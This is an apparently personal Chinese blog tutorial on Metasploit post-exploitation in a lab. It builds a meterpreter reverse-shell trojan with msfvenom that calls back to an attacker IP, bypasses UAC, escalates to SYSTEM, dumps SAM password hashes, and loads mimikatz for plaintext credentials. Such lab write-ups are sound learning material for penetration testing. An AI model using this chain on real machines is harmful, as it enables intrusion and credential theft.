天道酬勤

Metasploit—权限与Hashdump之间的认识

上线

先利用命令生成一个马:

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.234.151 lport=2345 -f exe >hackergugu.exe

然后我们再去监听:

use exploit/multi/handler

我们在目标机器上,运行生成的木马,现在已经上线

利用getuid获取当前的用户

hashdump

我们尝试运行命令hashdump

出现这段字呢。”priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.” 大致的原因就是权限不够吧。

(但是后来就算我提权了,还是没有解决掉这个问题,所以环境各种各样很奇葩,还是得多练,有经验了就好了)

我们也可以利用后渗透模块 run post/windows/gather/hashdump

还是没有成功,给我们说使用这个模块,我们需要得到一个system权限。后面紧跟着一个小提示,将进程转移到一个一个system权限下的进程。

提权

尝试命令getsystem

此命令尝试了四种提权方式,均失败。

失败的原因是目标机器存在uac,所以我们需要绕过uac。

background,将当前会话移动到后台,为 session 1。

search bypassuac,寻找绕过uac的exp。

我们选取第一个exp即可。

我们使用此exp时,我们仅需要设置session即可。如果bypass成功,就又会重新生成一个绕过uac的session。

上图中,包含了两个session。session1即为最初没有绕过uac的会话,session2即为绕过uac的会话。

我们再次尝试hashdump

无论哪一种命令,都还是失败的。所以这里要注意,绕过uac并不是拿到了system权限,绕过uac可以在一定程度上帮助我们拿到system权限。

例如接下来,我们在绕过uac的会话里,执行命令getsystem,便提权成功了。

hashdump成功

另外再写一下mimikatz的用法。

mimikatz

load mimikatz,先加载mimikatz

有三种命令可以获取明文密码,分别是

wdigest

kerberos

msv

这里有一点没太弄明白,一直出现 “mod_process::getVeryBasicModulesListForProcess : (0x0000012b) Ō�� ReadProcessMemory WriteProcessMemory �B n.a. (wdigest KO)”

操作是成功了,但是获取不到明文密码,暂时不清楚是什么原因。 也可能是因为每台机器的差异,实战的时候,因环境而已,多练就好了,最重要的是经验。

赞(0) 打赏
未经允许不得转载:HackerGu‘s Blog » Metasploit—权限与Hashdump之间的认识
分享到: 更多 (0)

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址

专注黑客技术的研究

联系我们联系我们

觉得文章有用就打赏一下文章作者

微信扫一扫打赏